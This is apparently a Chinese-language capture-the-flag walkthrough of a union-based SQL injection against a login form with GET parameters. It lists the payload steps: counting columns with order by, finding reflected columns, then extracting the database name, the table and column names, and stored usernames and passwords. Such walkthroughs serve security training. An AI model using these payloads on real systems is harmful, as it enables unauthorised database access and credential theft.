首先我们随意输入用户名,密码,判断此为get方式传参
紧接着闭合密码便可以很容易地得出此为一个get基于报错的注入
当然碰到登陆页面我们首先想到的便是万能密码,也可以知道此为sql注入
开始注入,get基于报错的常规流程
- order by判断字段数
1' order by 4#
1' order by 3#
说明有三个字段
- 紧接着判断回显点
1' union select 1,2,3 #
很明显2,3都为注入点
-
爆库 1' union select 1,database(),3 # -
爆表 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# -
爆字段名 1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'# -
得出信息 1' union select 1,group_concat(id,username,password),3 from l0ve1ysq1 #
|